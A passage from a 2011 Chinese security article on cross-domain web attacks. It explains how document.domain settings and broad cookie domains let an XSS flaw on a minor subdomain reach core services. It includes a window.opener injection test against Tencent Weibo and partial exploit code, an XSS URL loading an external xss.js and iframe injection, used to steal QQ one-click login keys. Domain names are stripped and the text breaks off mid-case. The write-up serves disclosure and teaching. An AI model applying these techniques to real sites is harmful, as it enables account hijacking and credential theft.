浅谈跨越WEB攻击.docVIP

Web开发框架安全杂谈 浅谈跨域WEB攻击 Write by admin in 未分类 at 2011-04-08 17:03:53 浅谈跨域web攻击 EMail: rayh4c#80Site: Date: 2011-04-07From: 0×00 前言 一直想说说跨域web攻击这一概念，先前积累了一些案例和经验，所以想写这么一篇文档让大家了解一下跨域web攻击，跨域web攻击指的是利用网站跨域安全设置缺陷进行的web攻击，有别于传统的攻击，跨域web攻击可以从网站某个不重要的业务直接攻击和影响核心业务。 传统的安全思维教会我们按资产、功能等需求划分核心业务，优先保护核心业务等，非核心业务的安全等级一般没有核心业务高，给我们错觉是非核心业务受到攻击的话，所造成损失不会很大，也不会影响到核心业务，所以让安全工作者了解跨域web攻击这一概念还是非常有意义的。 0×01 基于ajax跨域设置的跨域攻击 使用ajax技术让人头痛的地方就是如何跨域，受同源策略所限不同域名包括子域名在内是无法进行AJAX请求的，随后衍生出一类技术可以通过设置document.domain实现跨域。如和,当两个网站通过javascript操作DOM接口 document.domain=’’ 将网站的域设置为后，两个网站就处于同一个域内，可以进行各种跨域操作。在开发人员方面这是很方便的跨域技术，但是在攻击者眼中这简直就是一个大后门，黑客只需要找到*.下任意一个XSS漏洞，在任意一个子域名里的网页都可以跨域攻击和。 ajax跨域设置另外一个重点是这种跨域设置还会影响到窗口引用关系的同源策略，如腾讯微博网站进行了document.domain=’’的跨域设置，我们可以针对腾讯微博做个实验，在自己的腾讯微博/中发任意一个*.的网站的链接(如：），在腾讯微博中打开这个网站，然后在地址栏内用javascrit伪协议运行如下的脚本，你会发现腾讯微博所在的网页被注入了一个alert提示框： javascript:window.opener.eval(alert(/xss/)); 最后得出结论，由于腾讯微博网站进行了跨域设置，所以*.下的任意一个和腾讯微博有窗口引用关系的网页，都可以往腾讯微博跨域注入脚本运行。 案例：腾讯单点登录系统跨域劫持漏洞 QQ的客户端安装了一个快速登录插件，在客户端已登录且QQ.exe在运行的状态下,这个快速登录插件可以自动生成一个和QQ号对应的密钥，在IE浏览器访问QQ网站的各个应用时通过这个密钥可以免密码一键登录网站。我经过分析发现，这个快速登录插件最大的安全措施是生成密钥的关键函数设置了一个信任域，也就是在的网页中我们才可以使用这个插件生成密钥。快速登录插件的这个信任域安全措施本意是阻止其他非安全域的网页调用这个插件，而开发人员却在的一个网页写入了document.domain=’’的跨域设置，结果导致这个信任域形同虚设。通过QQ任意分站的一个XSS漏洞我们就能攻击，首先给分站的网页进行跨域设置，然后通过框架页嵌入的跨域设置页，由于两个网页都设置了同一个域，同源策略生效，那么就可以跨域操作框架注入脚本到的域内运行。部分攻击代码如下： /simp_search.php?keyword=/scriptscript/src=/xss.js/script xss.js的内容： =...... // 域内运行的攻击脚本省略document.domain=; //跨域设置function exploit(){crossQQdomain.location = javascript:eval();void(0);} //在id为crossQQdomain的框架中通过伪协议注入脚本document.write(iframe id=crossQQdomain src=/*.html onload=exploit()/iframe); 通过内设置的是调用快速登录插件攻击脚本代码，被攻击者访问了我们的跨站链接后，我们就可以获取到QQ的一键登录密钥，后果不可想象。 0×02 基于cookie安全的跨域攻击 以前关于csrf的文档提过cookie的“同源策略”，实际上这个只是含糊的说明了cookie的domain字段的作用。cookie的domain字段和浏览器约定俗成，如一般cookie的domain字段被默认设置为, 二级域名*.下就无法访问这个cookie，所以很多网站就将cookie的domain字段设置为.解决二级域名的cookie读取问题。 案例：第三方分站沦陷导致的百度cookie安全问题 在百度的passport登录以后，百度会给客户端设置一个名为BDUSS的cookie值，这个值的domain字段是.，如下： set-cookie